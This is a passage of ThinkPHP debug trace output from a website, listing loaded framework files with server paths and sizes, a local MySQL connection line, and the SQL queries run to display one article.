  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000826s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.001512s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.006761s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.008997s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000700s ]
  6. SELECT * FROM `set` [ RunTime:0.024771s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000816s ]
  8. SELECT * FROM `article` WHERE `id` = 501004 LIMIT 1 [ RunTime:0.020986s ]
  9. UPDATE `article` SET `lasttime` = 1783011285 WHERE `id` = 501004 [ RunTime:0.016091s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 66 LIMIT 1 [ RunTime:0.004062s ]
  11. SELECT * FROM `article` WHERE `id` < 501004 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.041092s ]
  12. SELECT * FROM `article` WHERE `id` > 501004 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.047359s ]
  13. SELECT * FROM `article` WHERE `id` < 501004 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.068367s ]
  14. SELECT * FROM `article` WHERE `id` < 501004 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.086774s ]
  15. SELECT * FROM `article` WHERE `id` < 501004 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.047429s ]
0.484161s